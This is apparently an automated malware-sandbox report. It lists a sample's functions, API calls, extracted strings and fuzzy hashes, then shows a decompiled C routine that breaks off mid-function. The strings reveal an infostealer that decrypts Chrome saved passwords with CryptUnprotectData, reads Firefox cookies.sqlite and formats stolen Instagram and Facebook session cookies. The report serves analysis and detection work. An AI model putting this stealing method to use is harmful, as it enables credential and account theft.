                                                                                                                0x0127d11a
                                                                                                                0x0127d11f
                                                                                                                0x0127d121
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x0127d127
                                                                                                                0x0127d12a
                                                                                                                0x0127d12c
                                                                                                                0x0127d13e
                                                                                                                0x0127d141
                                                                                                                0x0127d159
                                                                                                                0x0127d15e
                                                                                                                0x0127d160
                                                                                                                0x0127d143
                                                                                                                0x0127d14a
                                                                                                                0x0127d14c
                                                                                                                0x0127d14c
                                                                                                                0x0127d163
                                                                                                                0x0127d165
                                                                                                                0x0127d16f
                                                                                                                0x0127d172
                                                                                                                0x0127d17b
                                                                                                                0x0127d181
                                                                                                                0x0127d181
                                                                                                                0x00000000
                                                                                                                0x0127d165
                                                                                                                0x00000000
                                                                                                                0x0127d12c
                                                                                                                0x0127d0ec
                                                                                                                0x0127d0ef
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x0127d0f5
                                                                                                                0x0127cfc8
                                                                                                                0x0127cfc8
                                                                                                                0x0127cfc9
                                                                                                                0x0127d003
                                                                                                                0x0127d006
                                                                                                                0x0127d008
                                                                                                                0x0127d00d
                                                                                                                0x0127d014
                                                                                                                0x0127d016
                                                                                                                0x0127d021
                                                                                                                0x0127d021
                                                                                                                0x0127d024
                                                                                                                0x0127d028
                                                                                                                0x0127d02c
                                                                                                                0x0127d037
                                                                                                                0x0127d039
                                                                                                                0x0127d03a
                                                                                                                0x0127d03d
                                                                                                                0x0127cf99
                                                                                                                0x0127cf99
                                                                                                                0x00000000
                                                                                                                0x0127cf99
                                                                                                                0x0127d048
                                                                                                                0x0127d04d
                                                                                                                0x0127d04f
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x0127d055
                                                                                                                0x0127d058
                                                                                                                0x0127d05a
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x0127d060
                                                                                                                0x0127d063
                                                                                                                0x00000000
                                                                                                                0x0127d063
                                                                                                                0x0127d02e
                                                                                                                0x0127d031
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x0127d031
                                                                                                                0x0127d018
                                                                                                                0x0127d01b
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x0127d01b
                                                                                                                0x0127cfcb
                                                                                                                0x0127cfcb
                                                                                                                0x0127cfce
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x0127cfd4
                                                                                                                0x0127cfd6
                                                                                                                0x0127cfec
                                                                                                                0x0127cfec
                                                                                                                0x0127cff1
                                                                                                                0x0127cff2
                                                                                                                0x0127cff6
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x0127cffc
                                                                                                                0x0127cfda
                                                                                                                0x0127cfe0
                                                                                                                0x0127cfe3
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x0127cfe9
                                                                                                                0x00000000
                                                                                                                0x0127cfe9
                                                                                                                0x0127cefb
                                                                                                                0x0127cf22
                                                                                                                0x0127cf26
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x0127cf26
                                                                                                                0x0127cf2a
                                                                                                                0x0127cf4d
                                                                                                                0x0127cf4d
                                                                                                                0x0127cf50
                                                                                                                0x0127cf55
                                                                                                                0x0127cf65
                                                                                                                0x0127cf65
                                                                                                                0x0127cf67
                                                                                                                0x0127cfa0
                                                                                                                0x0127cfa0
                                                                                                                0x0127cfa3
                                                                                                                0x0127cfa3
                                                                                                                0x00000000
                                                                                                                0x0127cfa3
                                                                                                                0x0127cf69
                                                                                                                0x0127cf6c
                                                                                                                0x0127cf6e
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x0127cf70
                                                                                                                0x0127cf75
                                                                                                                0x0127cf76
                                                                                                                0x0127cf7a
                                                                                                                0x0127cf7d
                                                                                                                0x0127cf88
                                                                                                                0x0127cf8a
                                                                                                                0x0127cf8b
                                                                                                                0x0127cf8e
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x0127cf90
                                                                                                                0x0127cf97
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x0127cf97
                                                                                                                0x0127cf7f
                                                                                                                0x0127cf86
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x0127cf86
                                                                                                                0x0127cf57
                                                                                                                0x0127cf5c
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x0127cf5e
                                                                                                                0x0127cf63
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x0127cf63
                                                                                                                0x0127cf2c
                                                                                                                0x0127cf31
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x0127cf33
                                                                                                                0x0127cf38
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x0127cf40
                                                                                                                0x0127cf45
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x0127cf47
                                                                                                                0x00000000
                                                                                                                0x0127cf47

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.283909709.0000000001261000.00000020.00020000.sdmp, Offset: 01260000, based on PE: true
                                                                                                                • Associated: 00000001.00000002.283885818.0000000001260000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283942193.0000000001299000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283960003.00000000012AA000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283969432.00000000012AC000.00000008.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284553157.0000000001388000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284568622.000000000138C000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284595520.000000000138D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: Focus$MessageParentStateWindow$BeepDialogH_prolog3_catch
                                                                                                                • String ID:
                                                                                                                • API String ID: 44247675-0
                                                                                                                • Opcode ID: 9a6b60af4d221ed897117057214d1196669a5ccc2166fd182b6b052446173135
                                                                                                                • Instruction ID: b6277b24c0a7ed67a5f2119fd202ec34898acfb69fc4621a85fa0a0899f517b4
                                                                                                                • Opcode Fuzzy Hash: 9a6b60af4d221ed897117057214d1196669a5ccc2166fd182b6b052446173135
                                                                                                                • Instruction Fuzzy Hash: D8D1A07063120B9FEF26AFB8D844ABF7BB5EF49750F144019EA05AB291DB31C881CB51
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 10004466, Relevance: 24.9, APIs: 9, Strings: 5, Instructions: 419sleepCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • _memset.LIBCMT ref: 100044E8
                                                                                                                • _memset.LIBCMT ref: 100044FE
                                                                                                                • Sleep.KERNEL32(00000064,?,00000000,?,00000000,100BAD4C,100BAB05,?,00000000,?,00000000,00000003,?,00000010,00000000,00000000), ref: 10004962
                                                                                                                • __snprintf_s.LIBCMT ref: 10004744
                                                                                                                  • Part of subcall function 1007F459: __vsnprintf_s_l.LIBCMT ref: 1007F46E
                                                                                                                  • Part of subcall function 1000374B: _memset.LIBCMT ref: 1000382E
                                                                                                                  • Part of subcall function 1000374B: _memset.LIBCMT ref: 10003843
                                                                                                                • Sleep.KERNEL32(00000064,?,00000000,?,00000000,00000003,?,00000010,00000000,00000000), ref: 100046DE
                                                                                                                  • Part of subcall function 100804D1: _strlen.LIBCMT ref: 100804E3
                                                                                                                  • Part of subcall function 100804D1: _malloc.LIBCMT ref: 100804EC
                                                                                                                  • Part of subcall function 10003535: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 1000355A
                                                                                                                • __snprintf_s.LIBCMT ref: 100049D7
                                                                                                                • _free.LIBCMT ref: 10004A25
                                                                                                                • _free.LIBCMT ref: 10004A30
                                                                                                                • _free.LIBCMT ref: 10004A3F
                                                                                                                  • Part of subcall function 100804D1: __invoke_watson.LIBCMT ref: 1008051B
                                                                                                                  • Part of subcall function 10003535: _malloc.LIBCMT ref: 10003579
                                                                                                                  • Part of subcall function 10003535: _memset.LIBCMT ref: 1000358C
                                                                                                                  • Part of subcall function 10003535: _memmove.LIBCMT ref: 100035A6
                                                                                                                  • Part of subcall function 10003535: __snprintf_s.LIBCMT ref: 100035B5
                                                                                                                  • Part of subcall function 10003535: _free.LIBCMT ref: 100035BB
                                                                                                                  • Part of subcall function 10003535: LocalFree.KERNEL32(?), ref: 100035C9
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.285888122.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000001.00000002.285875258.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.285982320.00000000100A8000.00000002.00000001.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.286024378.00000000100D0000.00000004.00000001.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.286047522.00000000100DB000.00000002.00000001.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: _memset$_free$__snprintf_s$Sleep_malloc$CryptDataFreeLocalUnprotect__invoke_watson__vsnprintf_s_l_memmove_strlen
                                                                                                                • String ID: encrypted_value$hex(password_value)$signon_realm$username_value$v10
                                                                                                                • API String ID: 3603134311-1505421687
                                                                                                                • Opcode ID: 4e0ba0e5b1410224ac34f5dffd5772a42011e2a7b28b14c068c23d876784769a
                                                                                                                • Instruction ID: de324ac0bb5d8da6a503ccd149055a4b87c34390f536f0cb1e0442dc13e44da7
                                                                                                                • Opcode Fuzzy Hash: 4e0ba0e5b1410224ac34f5dffd5772a42011e2a7b28b14c068c23d876784769a
                                                                                                                • Instruction Fuzzy Hash: FAF19F742083819FE721CF64C891B9BB7E8EF89380F50492DF5C987196DBB1A948CB57
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 1000CD55, Relevance: 23.1, APIs: 1, Strings: 12, Instructions: 324COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                  • Part of subcall function 10006263: _memmove.LIBCMT ref: 100062B8
                                                                                                                • _wprintf.LIBCMT ref: 1000D076
                                                                                                                  • Part of subcall function 1000A9F2: __EH_prolog3.LIBCMT ref: 1000A9F9
                                                                                                                  • Part of subcall function 10007445: __EH_prolog3.LIBCMT ref: 1000744C
                                                                                                                  • Part of subcall function 10005433: _memmove.LIBCMT ref: 1000549B
                                                                                                                  • Part of subcall function 100069AE: _memmove.LIBCMT ref: 100069CE
                                                                                                                  • Part of subcall function 100111F6: __EH_prolog3.LIBCMT ref: 100111FD
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.285888122.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000001.00000002.285875258.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.285982320.00000000100A8000.00000002.00000001.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.286024378.00000000100D0000.00000004.00000001.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.286047522.00000000100DB000.00000002.00000001.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: H_prolog3_memmove$_wprintf
                                                                                                                • String ID: ", "path":"/", "secure": false,"value": "$"},$Accept-Language: zh-CN,zh;q=0.9$Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8$Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8r$Cache-Control: max-age=0$Connection: keep-alive$Cookie: $Upgrade-Insecure-Requests: 1$\\"$instagram cookie:%s${"domain":"www.instagram.com", "expirationDate":1590337688, "hostOnly": false, "httpOnly": true, "name": "
                                                                                                                • API String ID: 2411079180-1716934654
                                                                                                                • Opcode ID: 57919a9adf6fcddb1461b49558468ca373fa810876b752cef63e194d54c5d94a
                                                                                                                • Instruction ID: f2ddc67f0a02b32231b7bb33c00d4cd2b2ab4a87ec8f09e9f5ea5b52070216b6
                                                                                                                • Opcode Fuzzy Hash: 57919a9adf6fcddb1461b49558468ca373fa810876b752cef63e194d54c5d94a
                                                                                                                • Instruction Fuzzy Hash: 69B1D275608380AFF724DB64CC52FAF7BD9EF86290F04094DF58597286DBB469408BA3
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 1000BB4A, Relevance: 21.3, APIs: 1, Strings: 11, Instructions: 265COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                  • Part of subcall function 10006263: _memmove.LIBCMT ref: 100062B8
                                                                                                                • _wprintf.LIBCMT ref: 1000BDB0
                                                                                                                  • Part of subcall function 10007445: __EH_prolog3.LIBCMT ref: 1000744C
                                                                                                                  • Part of subcall function 10005433: _memmove.LIBCMT ref: 1000549B
                                                                                                                  • Part of subcall function 100069AE: _memmove.LIBCMT ref: 100069CE
                                                                                                                  • Part of subcall function 100111F6: __EH_prolog3.LIBCMT ref: 100111FD
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.285888122.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000001.00000002.285875258.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.285982320.00000000100A8000.00000002.00000001.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.286024378.00000000100D0000.00000004.00000001.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.286047522.00000000100DB000.00000002.00000001.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: _memmove$H_prolog3$_wprintf
                                                                                                                • String ID: ", "path":"/", "sameSite": "no_restriction", "secure": true, "session": false, "storeId": "0", "value": "$"},$Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8$Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8r$Cache-Control: max-age=0$Connection: keep-alive$Cookie: $H$Upgrade-Insecure-Requests: 1$cookie:%s${"domain":"facebook.com", "expirationDate":1590337688, "hostOnly": false, "httpOnly": true, "name": "
                                                                                                                • API String ID: 574474398-3551333884
                                                                                                                • Opcode ID: fc139a6d6a4482f1bf160420349e719284e6054b1b3ceec934fc03d3930dafec
                                                                                                                • Instruction ID: 53cf59a9d4d6a7c727a068a1885978ff9bc9ebab0bb0344d225a1b124842016c
                                                                                                                • Opcode Fuzzy Hash: fc139a6d6a4482f1bf160420349e719284e6054b1b3ceec934fc03d3930dafec
                                                                                                                • Instruction Fuzzy Hash: 5691BF75608340AFE724CB64CC92FAFB7DAEF89250F14490DF58596286DB74B904CBA3
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 100098FC, Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 100COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                  • Part of subcall function 10009C66: _memset.LIBCMT ref: 10009C8A
                                                                                                                  • Part of subcall function 10009C66: _memset.LIBCMT ref: 10009C99
                                                                                                                  • Part of subcall function 10009C66: GetEnvironmentVariableW.KERNEL32(APPDATA,?,00000104,?,?,?,?,?,00000000), ref: 10009CB3
                                                                                                                  • Part of subcall function 10009C66: GetPrivateProfileStringW.KERNEL32 ref: 10009CFF
                                                                                                                • _wprintf.LIBCMT ref: 1000992E
                                                                                                                • GetFileAttributesW.KERNEL32(00000000), ref: 1000993E
                                                                                                                  • Part of subcall function 100052E4: _memset.LIBCMT ref: 1000530B
                                                                                                                  • Part of subcall function 100052E4: GetShortPathNameW.KERNEL32 ref: 10005320
                                                                                                                  • Part of subcall function 100052E4: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,00000000,C:\Users\user\AppData\Local\Google\Chrome\User Data\Default), ref: 10005340
                                                                                                                  • Part of subcall function 100052E4: _malloc.LIBCMT ref: 10005349
                                                                                                                  • Part of subcall function 100052E4: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000,?,00000000,C:\Users\user\AppData\Local\Google\Chrome\User Data\Default), ref: 10005366
                                                                                                                  • Part of subcall function 100052E4: _free.LIBCMT ref: 1000536D
                                                                                                                • swprintf.LIBCMT ref: 100099A6
                                                                                                                • _free.LIBCMT ref: 100099AC
                                                                                                                • _sprintf.LIBCMT ref: 100099F6
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.285888122.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000001.00000002.285875258.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.285982320.00000000100A8000.00000002.00000001.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.286024378.00000000100D0000.00000004.00000001.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.286047522.00000000100DB000.00000002.00000001.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: _memset$ByteCharMultiWide_free$AttributesEnvironmentFileNamePathPrivateProfileShortStringVariable_malloc_sprintf_wprintfswprintf
                                                                                                                • String ID: %S$%s\%S$Firefox: path convert encode failed: %s$cookies.sqlite$path not existed: %s
                                                                                                                • API String ID: 3136356854-3888254744
                                                                                                                • Opcode ID: bfa66dfc378bd4c658ffed0ae8ab5dc69e646e3e4683f790dcce8db5ed189a9f
                                                                                                                • Instruction ID: c648d6f9cb37c6828bc33c6e0c7ddeb959f03acbe49b049c84718c9b168d4931
                                                                                                                • Opcode Fuzzy Hash: bfa66dfc378bd4c658ffed0ae8ab5dc69e646e3e4683f790dcce8db5ed189a9f
                                                                                                                • Instruction Fuzzy Hash: 50214C3960061157F634E72D8C929BF7798EFC5AD0754421DFE455B38AEB212E0283A1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 01287914, Relevance: 16.8, APIs: 11, Instructions: 284COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 74%
                                                                                                                			E01287914(void* __ebx, signed int __edx, void* __edi, void* __esi, signed int _a4, signed int _a8) {
				char _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				char _v24;
				void _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				void* _v68;
				intOrPtr _v72;
				char _v76;
				char _v80;
				signed int _v120;
				signed int _v128;
				signed int _v132;
				intOrPtr _v160;
				void* __ebp;
				signed int* _t129;
				signed int _t131;
				void* _t132;
				signed int _t135;
				signed int _t137;
				signed int _t139;
				void* _t140;
				signed int _t141;
				signed int _t144;
				signed int _t147;
				signed int _t150;
				signed int _t152;
				void* _t155;
				void* _t159;
				void* _t160;
				void* _t161;
				void* _t163;
				void* _t165;
				signed int _t169;
				signed int _t174;
				void* _t175;
				signed int _t177;
				signed int _t181;
				signed int _t186;
				signed int _t193;
				signed int _t195;
				signed int _t198;
				void* _t199;
				signed int _t201;
				void* _t202;
				signed int _t204;
				signed int _t210;
				signed int _t219;
				signed int _t225;
				signed int* _t228;
				signed int _t232;
				void* _t234;
				signed int _t235;
				void* _t237;
				signed int _t245;
				signed int _t246;
				void* _t248;
				signed int _t261;
				void* _t271;
				signed int _t274;
				signed int _t283;
				signed int* _t288;
				signed int _t290;
				void* _t291;
				intOrPtr _t292;
				signed int _t301;
				signed int _t302;
				signed int _t304;
				signed int _t316;
				void* _t318;
				void* _t320;
				signed int _t321;
				signed int _t322;
				signed int _t325;
				void* _t327;
				signed int _t328;

				_t283 = __edx;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t288 = _a4;
				_v12 = 0;
				_v16 = 0;
				_v8 = 0;
				if(_t288 != 0) {
					E01283870(_t288, 0xff, 0x24);
					_t301 = _a8;
					_t328 = _t327 + 0xc;
					__eflags = _t301;
					if(_t301 == 0) {
						goto L1;
					} else {
						__eflags =  *(_t301 + 4);
						if(__eflags > 0) {
							L9:
							_t132 = 7;
							__eflags =  *(_t301 + 4) - _t132;
							if(__eflags < 0) {
								L12:
								E0128FD86(0, _t283, _t288, _t301, __eflags);
								_t135 = E0128FADD( &_v12);
								__eflags = _t135;
								if(_t135 != 0) {
									L45:
									_push(0);
									_push(0);
									_push(0);
									_push(0);
									_push(0);
									E012882BA(0, _t283);
									asm("int3");
									_t325 = _t328;
									_t137 =  *0x12aa3f0; // 0xddd5d539
									_v64 = _t137 ^ _t325;
									_v128 = _v128 & 0x00000000;
									_v132 = _v132 & 0x00000000;
									_push(_t288);
									_t290 = _v52;
									_v120 = _t290;
									__eflags = _t290;
									if(_t290 != 0) {
										_t139 =  *(_t290 + 0x14);
										_push(0);
										asm("cdq");
										_push(_t301);
										_t232 = _t139;
										_t304 = _t283;
										_t140 = _t139 + 0xffffffbb;
										_v56 = _t232;
										_v52 = _t304;
										asm("adc ecx, 0xffffffff");
										__eflags = _t304;
										if(__eflags > 0) {
											L74:
											_t141 = E01285A48();
											 *_t141 = 0x16;
											_t284 = _t283 | _t141 | 0xffffffff;
											__eflags = _t283 | _t141 | 0xffffffff;
											goto L75;
										} else {
											if(__eflags < 0) {
												L51:
												_t144 =  *(_t290 + 0x10);
												__eflags = _t144;
												if(_t144 < 0) {
													L53:
													asm("cdq");
													_t245 = 0xc;
													_t283 = _t144 % _t245;
													_t246 = _t283;
													asm("cdq");
													_t232 = _t232 + _t144 / _t245;
													 *(_t290 + 0x10) = _t246;
													_v56 = _t232;
													asm("adc esi, edx");
													_v52 = _t304;
													__eflags = _t246;
													if(_t246 < 0) {
														_t232 = _t232 + 0xffffffff;
														__eflags = _t232;
														_t78 = _t246 + 0xc; // 0x47
														 *(_t290 + 0x10) = _t78;
														asm("adc esi, 0xffffffff");
														_v56 = _t232;
														_v52 = _t304;
													}
													_t248 = _t232 + 0xffffffbb;
													asm("adc eax, 0xffffffff");
													__eflags = _t304;
													if(__eflags > 0) {
														goto L74;
													} else {
														if(__eflags < 0) {
															goto L58;
														} else {
															__eflags = _t248 - 0x408;
															if(_t248 > 0x408) {
																goto L74;
															} else {
																goto L58;
															}
														}
													}
												} else {
													__eflags = _t144 - 0xb;
													if(_t144 <= 0xb) {
														L58:
														_t147 =  *(_t290 + 0x10);
														_v60 = _t147;
														asm("cdq");
														_t292 =  *((intOrPtr*)(0x12aaf40 + _t147 * 4));
														_v64 = _t283;
														_v72 = _t292;
														_t150 = E01290520(_t232, _t304, 4, 0) | _t283;
														__eflags = _t150;
														if(_t150 != 0) {
															L60:
															asm("adc eax, 0x0");
															_t152 = E01290520(_t232 + 0x76c, _t304, 0x190, 0);
															__eflags = _t152 | _t283;
															if((_t152 | _t283) == 0) {
																goto L61;
															}
														} else {
															_t186 = E01290520(_t232, _t304, 0x64, _t150);
															__eflags = _t186 | _t283;
															if((_t186 | _t283) != 0) {
																L61:
																__eflags = _v60 - 1;
																if(_v60 > 1) {
																	_v72 = _t292 + 1;
																	asm("adc dword [ebp-0x38], 0x0");
																}
															} else {
																goto L60;
															}
														}
														asm("sbb esi, 0x0");
														asm("adc eax, 0x0");
														_t155 = E01287830(_t232 + 0x12b, _v52, 0x190, 0);
														asm("cdq");
														_v60 = _t155 +  *((intOrPtr*)(_v68 + 0xc));
														asm("adc ebx, edx");
														_v60 = _v60 - E01287830(_t232 - 1, _t304, 0x64, 0);
														asm("sbb ebx, edx");
														_t159 = E01287830(_t232 - 1, _t304, 4, 0);
														asm("adc ebx, edx");
														_t160 = E012878E0(_v56, _v52, 0x16d, 0);
														asm("adc ebx, edx");
														asm("adc ebx, [ebp-0x38]");
														asm("sbb ebx, edi");
														_t161 = E012878E0(_v60 + _t159 + _t160 + _v72 - 0x63df, _t283, 0x18, 0);
														_t234 = _v68;
														asm("cdq");
														asm("adc ecx, edx");
														_t163 = E012878E0(_t161 +  *((intOrPtr*)(_t234 + 8)), _t283, 0x3c, 0);
														asm("cdq");
														asm("adc ecx, edx");
														_t165 = E012878E0(_t163 +  *((intOrPtr*)(_t234 + 4)), _t283, 0x3c, 0);
														_t314 = _t283;
														asm("cdq");
														asm("adc esi, edx");
														_v56 = _t165 +  *_t234;
														_v52 = _t283;
														__eflags = _a4;
														if(__eflags == 0) {
															_t169 = E0128FB5B( &_v48,  &_v56);
															goto L72;
														} else {
															E0128FD86(_t234, _t283, 0, _t314, __eflags);
															_t174 = E0128FB07( &_v76);
															__eflags = _t174;
															if(_t174 != 0) {
																L77:
																_push(0);
																_push(0);
																_push(0);
																_push(0);
																_push(0);
																_t175 = E012882BA(_t234, _t283);
																asm("int3");
																_push(_t325);
																_push("true");
																_push(_v160);
																L46();
																return _t175;
															} else {
																_t177 = E0128FB31( &_v80);
																__eflags = _t177;
																if(_t177 != 0) {
																	goto L77;
																} else {
																	asm("cdq");
																	_v56 = _v56 + _v80;
																	asm("adc [ebp-0x2c], edx");
																	_t181 = E01287914(_t234, _t283, 0, _t314,  &_v48,  &_v56);
																	__eflags = _t181;
																	if(_t181 != 0) {
																		goto L74;
																	} else {
																		__eflags =  *(_t234 + 0x20);
																		if(__eflags > 0) {
																			L70:
																			asm("cdq");
																			_v56 = _v56 + _v76;
																			asm("adc [ebp-0x2c], edx");
																			_t169 = E01287914(_t234, _t283, 0, _t314,  &_v48,  &_v56);
																			L72:
																			__eflags = _t169;
																			if(_t169 != 0) {
																				goto L74;
																			} else {
																				goto L73;
																			}
																		} else {
																			if(__eflags >= 0) {
																				L73:
																				_t284 = _v52;
																				_t261 = 9;
																				memcpy(_t234,  &_v48, _t261 << 2);
																			} else {
																				__eflags = _v16;
																				if(_v16 <= 0) {
																					goto L73;
																				} else {
																					goto L70;
																				}
																			}
																		}
																	}
																	L75:
																	_pop(_t301);
																	_pop(0);
																	goto L76;
																}
															}
														}
													} else {
														goto L53;
													}
												}
											} else {
												__eflags = _t140 - 0x408;
												if(_t140 > 0x408) {
													goto L74;
												} else {
													goto L51;
												}
											}
										}
									} else {
										 *((intOrPtr*)(E01285A48())) = 0x16;
										_t284 = _t283 | E012882AA() | 0xffffffff;
										L76:
										__eflags = _v12 ^ _t325;
										_pop(_t291);
										return E012833E5(0, _v12 ^ _t325, _t284, _t291, _t301);
									}
								} else {
									_t193 = E0128FB07( &_v16);
									__eflags = _t193;
									if(_t193 != 0) {
										goto L45;
									} else {
										_t195 = E0128FB31( &_v8);
										__eflags = _t195;
										if(_t195 != 0) {
											goto L45;
										} else {
											_t235 =  *(_t301 + 4);
											_t271 =  *_t301;
											__eflags = _t235;
											if(__eflags < 0) {
												L23:
												_t131 = E0128FB5B(_t288, _t301);
												__eflags = _t131;
												if(_t131 == 0) {
													__eflags = _v12 - _t131;
													if(__eflags == 0) {
														L27:
														asm("cdq");
														_t316 = _t283;
														asm("cdq");
														_t237 =  *_t288 - _v8;
														asm("sbb esi, edx");
													} else {
														_push(_t288);
														_t219 = E0128FDD6(_t235, _t288, _t301, __eflags);
														__eflags = _t219;
														if(_t219 == 0) {
															goto L27;
														} else {
															asm("cdq");
															_t288[8] = 1;
															asm("cdq");
															_t237 =  *_t288 - _v16 + _v8;
															asm("sbb edx, esi");
															_a4 = _t283;
															_t316 = _t283;
														}
													}
													_t198 = E01290520(_t237, _t316, 0x3c, 0);
													 *_t288 = _t198;
													__eflags = _t198;
													if(_t198 < 0) {
														_t237 = _t237 + 0xffffffc4;
														 *_t288 = _t198 + 0x3c;
														asm("adc esi, 0xffffffff");
													}
													_t199 = E01287830(_t237, _t316, 0x3c, 0);
													_t238 = _t283;
													asm("cdq");
													_t318 = _t199 + _t288[1];
													asm("adc ebx, edx");
													_t201 = E01290520(_t318, _t283, 0x3c, 0);
													_t288[1] = _t201;
													__eflags = _t201;
													if(_t201 < 0) {
														_t318 = _t318 + 0xffffffc4;
														_t288[1] = _t201 + 0x3c;
														asm("adc ebx, 0xffffffff");
													}
													_t202 = E01287830(_t318, _t238, 0x3c, 0);
													_t239 = _t283;
													asm("cdq");
													_t320 = _t202 + _t288[2];
													asm("adc ebx, edx");
													_t204 = E01290520(_t320, _t283, 0x18, 0);
													_t288[2] = _t204;
													__eflags = _t204;
													if(_t204 < 0) {
														_t320 = _t320 + 0xffffffe8;
														_t288[2] = _t204 + 0x18;
														asm("adc ebx, 0xffffffff");
													}
													_t274 = E01287830(_t320, _t239, 0x18, 0);
													__eflags = _t283;
													if(__eflags < 0) {
														L43:
														_t288[3] = _t288[3] + _t274;
														asm("cdq");
														_t321 = 7;
														_t210 = _t288[3];
														_t288[6] = (_t288[6] + 7 + _t274) % _t321;
														__eflags = _t210;
														if(_t210 > 0) {
															goto L38;
														} else {
															_t288[4] = 0xb;
															_t288[3] = _t210 + 0x1f;
															_t55 = _t274 + 0x16d; // 0x16d
															_t288[7] = _t288[7] + _t55;
															_t288[5] = _t288[5] - 1;
														}
													} else {
														if(__eflags > 0) {
															L37:
															asm("cdq");
															_t322 = 7;
															_t39 =  &(_t288[3]);
															 *_t39 = _t288[3] + _t274;
															__eflags =  *_t39;
															_t288[6] = (_t288[6] + _t274) % _t322;
															L38:
															_t42 =  &(_t288[7]);
															 *_t42 = _t288[7] + _t274;
															__eflags =  *_t42;
														} else {
															__eflags = _t274;
															if(_t274 == 0) {
																__eflags = _t283;
																if(__eflags <= 0) {
																	if(__eflags < 0) {
																		goto L43;
																	} else {
																		__eflags = _t274;
																		if(_t274 < 0) {
																			goto L43;
																		}
																	}
																}
															} else {
